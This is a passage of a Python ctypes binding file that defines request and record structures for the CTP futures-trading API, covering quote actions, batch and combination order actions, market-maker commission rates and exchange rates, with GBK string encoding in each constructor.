        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class QryQuoteAction(Struct):
    """CTP quote-action query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class ExchangeQuoteAction(Struct):
    """CTP exchange-side quote action (cancel/modify) structure."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("QuoteSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("QuoteLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, ExchangeID=None, QuoteSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, QuoteLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, IPAddress=None, MacAddress=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("ExchangeID", ExchangeID),
            ("QuoteSysID", QuoteSysID),
            ("ActionFlag", ActionFlag),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("QuoteLocalID", QuoteLocalID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # InstallID is numeric and assigned verbatim when truthy.
        if InstallID:
            self.InstallID = InstallID
class QryExchangeQuoteAction(Struct):
    """CTP exchange quote-action query request structure."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class OptionInstrDelta(Struct):
    """CTP option-instrument delta record."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Delta", c_double),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Delta=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        for field, text in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Delta is numeric and assigned verbatim when truthy.
        if Delta:
            self.Delta = Delta
class ForQuoteRsp(Struct):
    """CTP request-for-quote response structure."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("ForQuoteSysID", c_char_Array_21),
        ("ForQuoteTime", c_char_Array_9),
        ("ActionDay", c_char_Array_9),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, TradingDay=None, InstrumentID=None, ForQuoteSysID=None, ForQuoteTime=None, ActionDay=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("TradingDay", TradingDay),
            ("InstrumentID", InstrumentID),
            ("ForQuoteSysID", ForQuoteSysID),
            ("ForQuoteTime", ForQuoteTime),
            ("ActionDay", ActionDay),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class StrikeOffset(Struct):
    """CTP strike-offset record for option exercise."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Offset", c_double),
        ("OffsetType", c_char),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Offset=None, OffsetType=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        for field, text in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("OffsetType", OffsetType),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Offset is numeric and assigned verbatim when truthy.
        if Offset:
            self.Offset = Offset
class QryStrikeOffset(Struct):
    """CTP strike-offset query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class InputBatchOrderAction(Struct):
    """CTP batch order-action input (request) structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("UserID", c_char_Array_16),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, UserID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
            ("UserID", UserID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("OrderActionRef", OrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
        ):
            if value:
                setattr(self, field, value)
class BatchOrderAction(Struct):
    """CTP batch order-action (broker-side) structure with status fields."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("StatusMsg", c_char_Array_81),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("StatusMsg", StatusMsg),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("OrderActionRef", OrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
        ):
            if value:
                setattr(self, field, value)
class ExchangeBatchOrderAction(Struct):
    """CTP exchange-side batch order-action structure."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]

    def __init__(self, ExchangeID=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, IPAddress=None, MacAddress=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("ExchangeID", ExchangeID),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # InstallID is numeric and assigned verbatim when truthy.
        if InstallID:
            self.InstallID = InstallID
class QryBatchOrderAction(Struct):
    """CTP batch order-action query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class CombInstrumentGuard(Struct):
    """CTP combination-instrument guarantee-ratio record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("GuarantRatio", c_double),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, GuarantRatio=None, ExchangeID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # GuarantRatio is numeric and assigned verbatim when truthy.
        if GuarantRatio:
            self.GuarantRatio = GuarantRatio
class QryCombInstrumentGuard(Struct):
    """CTP combination-instrument guard query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class InputCombAction(Struct):
    """CTP combination-action input (request) structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("CombActionRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Direction", c_char),
        ("Volume", c_int),
        ("CombDirection", c_char),
        ("HedgeFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, CombActionRef=None, UserID=None, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ExchangeID=None, IPAddress=None, MacAddress=None, InvestUnitID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("CombActionRef", CombActionRef),
            ("UserID", UserID),
            ("Direction", Direction),
            ("CombDirection", CombDirection),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Volume is numeric and assigned verbatim when truthy.
        if Volume:
            self.Volume = Volume
class CombAction(Struct):
    """CTP combination-action structure (full broker/exchange state)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("CombActionRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Direction", c_char),
        ("Volume", c_int),
        ("CombDirection", c_char),
        ("HedgeFlag", c_char),
        ("ActionLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ActionStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("SequenceNo", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ComTradeID", c_char_Array_21),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, CombActionRef=None, UserID=None, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ActionLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, ActionStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, IPAddress=None, MacAddress=None, ComTradeID=None, BranchID=None, InvestUnitID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("CombActionRef", CombActionRef),
            ("UserID", UserID),
            ("Direction", Direction),
            ("CombDirection", CombDirection),
            ("HedgeFlag", HedgeFlag),
            ("ActionLocalID", ActionLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("ActionStatus", ActionStatus),
            ("TradingDay", TradingDay),
            ("UserProductInfo", UserProductInfo),
            ("StatusMsg", StatusMsg),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
            ("ComTradeID", ComTradeID),
            ("BranchID", BranchID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("Volume", Volume),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("SequenceNo", SequenceNo),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
        ):
            if value:
                setattr(self, field, value)
class QryCombAction(Struct):
    """CTP combination-action query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class ExchangeCombAction(Struct):
    """CTP exchange-side combination-action structure."""
    _fields_ = [
        ("Direction", c_char),
        ("Volume", c_int),
        ("CombDirection", c_char),
        ("HedgeFlag", c_char),
        ("ActionLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("ActionStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("SequenceNo", c_int),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ComTradeID", c_char_Array_21),
        ("BranchID", c_char_Array_9),
    ]

    def __init__(self, Direction=None, Volume=None, CombDirection=None, HedgeFlag=None, ActionLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, ActionStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, SequenceNo=None, IPAddress=None, MacAddress=None, ComTradeID=None, BranchID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("Direction", Direction),
            ("CombDirection", CombDirection),
            ("HedgeFlag", HedgeFlag),
            ("ActionLocalID", ActionLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("ActionStatus", ActionStatus),
            ("TradingDay", TradingDay),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
            ("ComTradeID", ComTradeID),
            ("BranchID", BranchID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("Volume", Volume),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("SequenceNo", SequenceNo),
        ):
            if value:
                setattr(self, field, value)
class QryExchangeCombAction(Struct):
    """CTP exchange combination-action query request structure."""
    _fields_ = [
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
    ]

    def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class ProductExchRate(Struct):
    """CTP product exchange-rate record."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("QuoteCurrencyID", c_char_Array_4),
        ("ExchangeRate", c_double),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, ProductID=None, QuoteCurrencyID=None, ExchangeRate=None, ExchangeID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        for field, text in (
            ("ProductID", ProductID),
            ("QuoteCurrencyID", QuoteCurrencyID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # ExchangeRate is numeric and assigned verbatim when truthy.
        if ExchangeRate:
            self.ExchangeRate = ExchangeRate
class QryProductExchRate(Struct):
    """CTP product exchange-rate query request structure."""
    _fields_ = [
        ("ProductID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, ProductID=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (("ProductID", ProductID), ("ExchangeID", ExchangeID)):
            if text:
                setattr(self, field, text.encode("GBK"))
class QryForQuoteParam(Struct):
    """CTP request-for-quote parameter query structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class ForQuoteParam(Struct):
    """CTP request-for-quote parameter record (last price and price interval)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("LastPrice", c_double),
        ("PriceInterval", c_double),
    ]

    def __init__(self, BrokerID=None, InstrumentID=None, ExchangeID=None, LastPrice=None, PriceInterval=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (("LastPrice", LastPrice), ("PriceInterval", PriceInterval)):
            if value:
                setattr(self, field, value)
class MMOptionInstrCommRate(Struct):
    """CTP market-maker option commission-rate record."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OpenRatioByMoney", c_double),
        ("OpenRatioByVolume", c_double),
        ("CloseRatioByMoney", c_double),
        ("CloseRatioByVolume", c_double),
        ("CloseTodayRatioByMoney", c_double),
        ("CloseTodayRatioByVolume", c_double),
        ("StrikeRatioByMoney", c_double),
        ("StrikeRatioByVolume", c_double),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, StrikeRatioByMoney=None, StrikeRatioByVolume=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric rate fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("OpenRatioByMoney", OpenRatioByMoney),
            ("OpenRatioByVolume", OpenRatioByVolume),
            ("CloseRatioByMoney", CloseRatioByMoney),
            ("CloseRatioByVolume", CloseRatioByVolume),
            ("CloseTodayRatioByMoney", CloseTodayRatioByMoney),
            ("CloseTodayRatioByVolume", CloseTodayRatioByVolume),
            ("StrikeRatioByMoney", StrikeRatioByMoney),
            ("StrikeRatioByVolume", StrikeRatioByVolume),
        ):
            if value:
                setattr(self, field, value)
class QryMMOptionInstrCommRate(Struct):
    """CTP market-maker option commission-rate query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class MMInstrumentCommissionRate(Struct):
    """CTP market-maker instrument commission-rate record."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OpenRatioByMoney", c_double),
        ("OpenRatioByVolume", c_double),
        ("CloseRatioByMoney", c_double),
        ("CloseRatioByVolume", c_double),
        ("CloseTodayRatioByMoney", c_double),
        ("CloseTodayRatioByVolume", c_double),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric rate fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("OpenRatioByMoney", OpenRatioByMoney),
            ("OpenRatioByVolume", OpenRatioByVolume),
            ("CloseRatioByMoney", CloseRatioByMoney),
            ("CloseRatioByVolume", CloseRatioByVolume),
            ("CloseTodayRatioByMoney", CloseTodayRatioByMoney),
            ("CloseTodayRatioByVolume", CloseTodayRatioByVolume),
        ):
            if value:
                setattr(self, field, value)
class QryMMInstrumentCommissionRate(Struct):
    """CTP market-maker instrument commission-rate query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class InstrumentOrderCommRate(Struct):
    """CTP per-instrument order commission-rate record."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("OrderCommByVolume", c_double),
        ("OrderActionCommByVolume", c_double),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]

    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, OrderCommByVolume=None, OrderActionCommByVolume=None, ExchangeID=None, InvestUnitID=None):
        """Populate only truthy arguments; text fields are stored GBK-encoded."""
        super().__init__()
        # Character-array fields: encode to GBK bytes before assignment.
        for field, text in (
            ("InstrumentID", InstrumentID),
            ("InvestorRange", InvestorRange),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        # Numeric fields: assigned verbatim when truthy (zero is skipped, as before).
        for field, value in (
            ("OrderCommByVolume", OrderCommByVolume),
            ("OrderActionCommByVolume", OrderActionCommByVolume),
        ):
            if value:
                setattr(self, field, value)
class QryInstrumentOrderCommRate(Struct):
    """CTP instrument order commission-rate query request structure."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]

    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if text:
